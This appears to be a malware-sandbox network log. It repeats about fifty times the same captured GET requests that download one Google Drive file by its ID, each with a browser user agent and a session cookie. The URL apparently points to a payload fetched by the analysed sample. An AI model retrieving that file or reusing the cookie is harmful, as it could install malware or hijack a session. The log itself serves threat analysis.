      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
